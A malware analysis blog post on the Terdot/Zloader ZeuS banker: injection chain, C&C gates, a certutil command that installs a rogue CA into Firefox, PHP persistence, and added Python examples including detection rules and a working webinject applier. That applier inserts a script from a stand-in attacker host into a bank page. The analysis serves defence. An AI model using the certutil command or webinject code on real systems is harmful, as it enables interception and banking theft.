Submitted URL: https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/
Effective URL: https://www.malwarebytes.com/blog/news/2017/01/zbot-with-legitimate-applications-on-board
ZBOT WITH LEGITIMATE APPLICATIONS ON BOARD

Posted: January 26, 2017 by Malwarebytes Labs

The source code of the infamous ZeuS malware leaked in 2011. Since then, many
cybercriminals have adopted it and augmented it with their own ideas. Recently,
among the payloads delivered by exploit kits, we often find Terdot.A/Zloader, a
downloader that installs ZeuS-based malware on the victim machine.

The payload is very similar to the malware described in this article under the
name Sphinx. However, after consulting other researchers (special thanks to
Matthew Mesa), it was confirmed that the bot sold as Sphinx is a different
family (sample). Because of the confusion around the naming, we decided to
stick to the name Terdot Zloader/Zbot.

In this post we will have a look at the features and internals of this malware.
As we will see, the dropped package consists not only of malicious files but
also of legitimate applications used for malicious purposes.


ANALYZED SAMPLE

d45b8a20a991acd01d2ff63735fc1adf - original executable #1
950368afb934fd3fd5b2d4e6704b757b - original executable #2
fca092aca679edd9564d00e9640f939d - original executable #3
f9373dc232028da52ad33b017e33bbd3 - original executable #4

 * ae1d1f4597f76912d7bd9962b96eecbb - loader (unpacked)
   * 268fd83403da27a80ab1a3cf9ac45b67 - payload.dll (injected into explorer.exe)
     * 6c34779503414210378371d250a3a1af - client32.dll (Zbot, downloaded and
       injected into msiexec.exe and into browsers)


DISTRIBUTION

Most of the analyzed samples were dropped by SundownEK; some of the campaigns
are described in detail here: 28 Dec 2016, 6 Jan 2017, and 18 Jan 2017.
However, we also encountered cases where Terdot.A/Zloader was dropped by a
malicious email attachment.


BEHAVIORAL ANALYSIS

After the sample is run, we can see it spawning explorer.exe and then
terminating. It is easy to guess that it injected some malicious modules there.





If we attach a debugger to the explorer process, we can see the injected
shellcode along with a new PE file (payload.dll). An interesting and unusual
detail, typical for this Zloader, is that the DLL does not start at the
beginning of the memory page but after the shellcode, so a scanner that only
checks page-aligned offsets for an MZ header will miss it:
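The following is an added example, not code from the post, showing why that layout matters for memory forensics: it scans a region byte by byte for a DOS header whose e_lfanew really points at a PE signature, and contrasts that with the naive "MZ at page start" check. The region it scans is constructed (NOP filler standing in for the shellcode, followed by a minimal x86 PE header), not a real dump.

```python
import struct

PAGE_SIZE = 0x1000


def find_pe_headers(region: bytes):
    """Scan a memory region byte by byte for PE images and report where they
    start. Each hit is (offset, offset_within_page, machine). A hit requires
    an 'MZ' DOS stub whose e_lfanew field points at a 'PE\\0\\0' signature
    inside the same buffer, which filters out random 'MZ' byte pairs."""
    hits = []
    pos = region.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(region):
            e_lfanew = struct.unpack_from("<I", region, pos + 0x3C)[0]
            pe = pos + e_lfanew
            # e_lfanew of real images is small; the bound is a heuristic
            if 0x40 <= e_lfanew <= 0x400 and pe + 6 <= len(region) \
                    and region[pe:pe + 4] == b"PE\x00\x00":
                machine = struct.unpack_from("<H", region, pe + 4)[0]
                hits.append((pos, pos % PAGE_SIZE, machine))
        pos = region.find(b"MZ", pos + 1)
    return hits


def find_pe_headers_page_aligned(region: bytes):
    """The naive check: look for 'MZ' only at the start of each page."""
    return [p for p in range(0, len(region), PAGE_SIZE)
            if region[p:p + 2] == b"MZ"]


def build_sample_region() -> bytes:
    """Constructed stand-in for the injected region: 0x200 bytes of filler in
    place of the shellcode, then a minimal (non-loadable) PE header for an
    x86 image. Not a real memory dump."""
    shellcode = b"\x90" * 0x200
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)        # e_lfanew: NT headers at +0x80
    nt = b"PE\x00\x00" + struct.pack("<H", 0x14C)   # IMAGE_FILE_MACHINE_I386
    nt += b"\x00" * (0xF8 - len(nt))                # rest of the NT headers, zeroed
    return shellcode + bytes(dos) + nt + b"\x00" * 0x100


SAMPLE_REGION = build_sample_region()

if __name__ == "__main__":
    for off, in_page, machine in find_pe_headers(SAMPLE_REGION):
        print(f"PE at region+0x{off:x} (0x{in_page:x} into its page), "
              f"machine=0x{machine:x}")
    print("page-aligned scan found:", find_pe_headers_page_aligned(SAMPLE_REGION))
```

Against the constructed region the byte-wise scan reports one image 0x200 bytes into its page, while the page-aligned scan reports nothing, which is exactly the blind spot this Zloader's layout exploits.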



If an internet connection is available, the Zloader fetches the second stage
(the main bot) and injects it into msiexec.exe.

The injected module beacons to the C&C and downloads other modules. Observed
patterns of the gates:

/FE8hVs3/gs98h.php
/bdk/gate.php

The communication is encrypted:





The C&C responds with a new PE file, a module of the malware (client32.dll).
The downloader decrypts it in memory and injects it further: after a while we
see explorer terminating and another program being deployed, msiexec. The
initial malware executable is deleted.



Attaching a debugger to msiexec, we can find the Zbot (client32.dll) implanted
and running in the process space.



From inside the injected module another internet connection is made, and new
elements are downloaded and dropped (including legitimate applications such as
certutil and php; their role is described further below). The same
client32.dll is also injected into browsers.



The module deployed inside msiexec.exe acts as a supervisor. It opens local TCP
sockets and communicates with the modules injected into browsers in order to
monitor the pages they open.



MITM

The main module of the bot downloads and drops new elements into the %TEMP%
folder. Surprisingly, those files are not malware. We can see the certutil
application (0c6b43c9602f4d5ac9dcf907103447c4) along with its dependencies,
legitimate DLLs.



In the same folder there is also an alien certificate (the filename, as well
as the issuer name, is randomly generated).



The certificate is installed with the help of certutil for the purpose of
Man-in-the-Middle attacks (in this setting also called Man-in-the-Browser).
Note that this is the NSS certutil from the Mozilla tool set, which is why it
comes with its own DLLs; the Windows built-in certutil.exe does not accept the
-A/-n/-t/-d syntax used below. The trust string "C,C,C" marks the certificate
as a trusted CA for SSL, e-mail and object signing, and -d selects the Firefox
profile database the CA is added to.



Example - a command line deployed during tests:

"C:\Users\tester\AppData\Local\Temp\certutil.exe" 
-A -n "otdarufyr" 
-t "C,C,C" -i "C:\Users\tester\AppData\Local\Temp\nedea.crt" 
-d "C:\Users\tester\AppData\Roaming\Mozilla\Firefox\Profiles\be7dt337.default"


It is easy to guess that this malware targets web browsers. Indeed, if we run a
browser and visit a site over HTTPS, we see that the original certificates are
replaced by the malicious one. See the examples below: note that the subject of
the certificate contains the valid domain; only the issuer field lets us
recognize that the certificate is not legitimate:



Santander MitB on Firefox:



The browser claims that the connection is secure, but when we look at the
details we find that the connection is "protected" by the fake certificate
dropped by the malware:



Facebook MitB on Internet Explorer:



The browsers do not alert on any inconsistency, and a user who is not vigilant
enough to check the certificate details can easily be deceived. From the
browser's point of view nothing is wrong: the forged certificate chains to a
CA that is now in the local trust store, and Firefox by default exempts
locally added roots from its key-pinning checks, so pinning does not help
here either.



If we attach a debugger to the running browser, we can see that the same
client32.dll is injected there, along with more code used for API
redirections.

PERSISTENCE

In addition to the content dropped in %TEMP%, we can see some new folders with
random names created in %APPDATA%:





Interestingly, one of them contains a legitimate php.exe (see on VirusTotal:
php.exe, php5ts.dll).



...and some obfuscated PHP code:

https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-script-php

(Formatted version here).

Other folders contain some encrypted data, e.g.:



Interestingly, this PHP package is referenced at autostart:



The link launches the dropped PHP interpreter and runs the script we saw
before:



We can easily suspect that this is a persistence method. Deobfuscating the PHP
code confirms the guess. The same code after cleanup:

https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-deobfuscated-php

As we can see, the file royxh.umh contains the encrypted code of the malware.
Using the PHP script shown above, it is decrypted back into the Zloader
executable:

fca092aca679edd9564d00e9640f939d

The dropped file is run and then deleted.
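Both legitimate-tool abuses described on this page (the NSS certutil adding a CA to a Firefox profile from %TEMP%, and php.exe running a script out of %APPDATA% at logon) leave a distinctive process-creation trail. The following is an added detection example, not part of the post, that runs two rules over constructed process-creation records. The first certutil command line is the one observed above; the System32 certutil line, the php.exe paths and the random folder names are made up for the test.

```python
import re

# Constructed process-creation records (not real telemetry): each entry is the
# full command line as an EDR or Sysmon event 1 would record it.
SAMPLE_EVENTS = [
    r'"C:\Users\tester\AppData\Local\Temp\certutil.exe" -A -n "otdarufyr" -t "C,C,C" -i "C:\Users\tester\AppData\Local\Temp\nedea.crt" -d "C:\Users\tester\AppData\Roaming\Mozilla\Firefox\Profiles\be7dt337.default"',
    r'C:\Windows\System32\certutil.exe -verify C:\certs\server.cer',
    r'"C:\Users\tester\AppData\Roaming\ujqwm\php.exe" "C:\Users\tester\AppData\Roaming\ujqwm\ojqve.php"',
    r'"C:\Program Files\PHP\php.exe" -v',
]

# Directories a standard user can write to; a binary running from here is
# worth a second look even when the binary itself is clean.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmd: str):
    """Split a Windows command line into tokens, honouring double quotes.
    Good enough for these samples; not a full CommandLineToArgvW clone."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmd)]


def check_event(cmd: str):
    """Return (rule_name, image_path) when a record matches, else None."""
    argv = split_cmdline(cmd)
    if not argv:
        return None
    image, args = argv[0], argv[1:]
    name = image.rsplit("\\", 1)[-1].lower()
    from_user_dir = any(m in image.lower() for m in USER_WRITABLE)

    # Rule 1: NSS certutil adding a certificate to a Firefox profile database.
    # The Windows certutil.exe does not understand "-A ... -d <dir>", so this
    # syntax alone identifies the Mozilla tool, wherever it runs from.
    if name == "certutil.exe" and "-A" in args and "-d" in args:
        d = args.index("-d")
        profile = args[d + 1].lower() if d + 1 < len(args) else ""
        if "mozilla\\firefox\\profiles" in profile:
            return ("nss_certutil_add_ca", image)

    # Rule 2: a PHP interpreter living in a user-writable directory executing
    # a script (the autostart persistence seen above).
    if name == "php.exe" and from_user_dir \
            and any(a.lower().endswith(".php") for a in args):
        return ("php_from_user_dir", image)
    return None


def analyze(events):
    """Run every record through the rules and collect the hits in order."""
    return [hit for hit in (check_event(e) for e in events) if hit]


if __name__ == "__main__":
    for rule, image in analyze(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

Rule 1 deliberately keys on the NSS argument syntax rather than the path, so it also fires when the tool is dropped somewhere more respectable than %TEMP%; rule 2 is the generic "interpreter from a user-writable directory" check and would need a legitimate-path allowlist in an environment where developers run PHP from their home directory.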


INSIDE

ZLOADER - PAYLOAD.DLL

This element, unpacked from the initial sample and injected into explorer.exe,
is a downloader identified as Terdot.A/Zloader. It is responsible for
connecting to the C&C and downloading the main malicious module, the Zbot.





ZBOT - CLIENT32.DLL

The second stage is also a DLL; this time it is injected into msiexec.exe as
well as into browsers:





ATTACKED TARGETS

The bot injects itself into the most popular browsers in order to hook their
API:





It excludes computers with the Russian language installed from the attack, but
instead of doing so silently, like most malware, it announces the fact very
openly:



THE SQL PART

Inside the bot we can find references to an SQLite release from the end of 2016
(see SQLite Release 3.15.1 On 2016-11-04):





2016-11-04 12:08:49 1136863c76576110e710dd5d69ab6bf347c65e36


The presence of those references confirms that the bot is quite new (a build
cannot predate the SQLite release it statically links) and probably under
active development.



We can also see many SQL queries and related error messages among the strings:



They are used to read and manipulate browser cookies, which browsers such as
Firefox store in SQLite databases.



Queries deployed:



MAN-IN-THE-BROWSER

The main module injected into msiexec opens local TCP sockets that are used to
communicate with the module injected into the browser.





All communication between the browser and a given website is first passed
through the client32.dll injected into msiexec.



Like many Zbots, Terdot not only spies but also modifies the displayed
content, by means of "WebInjects" and "WebFakes".

The sites to be hooked are specified by configuration. An example target list
from one of the samples shows that the attackers' main interest is various
banks:
https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-targets-txt

Webinjects are implemented by adding malicious scripts (specialized for a
specific target) into the content of the website. The scripts are hosted on a
server controlled by the attackers. A sample list of the scripts fetched by
the bot during tests:
https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-injects-txt
Those JavaScript files are implanted into the attacked site before it is
displayed in the browser, along with some more obfuscated code. Templates of
such implants are downloaded from the C&C server. You can see some examples
here.
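To make the mechanism concrete, the following added example (not code from the post or the bot) parses one rule in the classic ZeuS webinjects.txt syntax (set_url / data_before / data_inject / data_after / data_end) and applies it to a page body the way the browser-side module would before rendering. The rule, the target URL, the script host and the HTML are all constructed; Terdot's own configuration format is not shown on this page and may differ.

```python
import fnmatch

# Constructed rule in ZeuS webinject syntax (assumption: Terdot's format is
# not on the page). The G/P flags select GET/POST in the original format and
# are carried along but ignored here.
SAMPLE_CONFIG = """
set_url https://online.bank.example/login* GP
data_before
<head>
data_end
data_inject
<script src="https://cdn.attacker.example/bank.js"></script>
data_end
data_after
data_end
"""

# Constructed response body standing in for the bank's login page.
SAMPLE_PAGE = ("<html><head><title>Login</title></head>"
               "<body><form action=\"/login\">...</form></body></html>")


def parse_webinjects(text):
    """Turn the config into rules: URL mask, flags and the three data blocks."""
    rules, cur, section, buf = [], None, None, []
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("set_url"):
            parts = s.split()
            cur = {"mask": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                   "before": "", "inject": "", "after": ""}
            rules.append(cur)
        elif s in ("data_before", "data_inject", "data_after"):
            section, buf = s[len("data_"):], []
        elif s == "data_end" and cur is not None and section is not None:
            cur[section] = "\n".join(buf)
            section = None
        elif section is not None:
            buf.append(line)
    return rules


def apply_webinjects(url, html, rules):
    """Apply every rule whose mask matches the URL. The text between
    data_before and data_after is replaced with data_inject; with an empty
    data_after the injection is inserted right after data_before. Returns
    (modified_html, number_of_injections)."""
    count = 0
    for rule in rules:
        if not fnmatch.fnmatchcase(url, rule["mask"]):
            continue
        start = html.find(rule["before"]) if rule["before"] else 0
        if start == -1:
            continue                       # anchor not present; rule is a no-op
        start += len(rule["before"])
        end = html.find(rule["after"], start) if rule["after"] else start
        if end == -1:
            continue
        html = html[:start] + rule["inject"] + html[end:]
        count += 1
    return html, count


if __name__ == "__main__":
    rules = parse_webinjects(SAMPLE_CONFIG)
    page, n = apply_webinjects("https://online.bank.example/login?lang=en",
                               SAMPLE_PAGE, rules)
    print(n, "injection(s):", page)
```

Because the rewrite happens inside the browser process after TLS has been terminated, neither the server nor the network sees anything unusual; the only artefact is the extra script tag in the DOM, which is why the fetched script list above is such a useful indicator.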


CONCLUSION

Terdot is yet another bot based on ZeuS. Feature-wise it is similar to other
bankers. However, I think it deserves some attention because of its recent
popularity. It has been prepared with attention to detail, so we may suspect
that it is the work of professionals. It is actively developed, distributed and
maintained, so the probability is high that we will be seeing more of it in the
future.





--------------------------------------------------------------------------------

This was a guest post written by Hasherezade, an independent researcher and
programmer with a strong interest in InfoSec. She loves going into detail about
malware and sharing threat information with the community. Check her out on
Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.


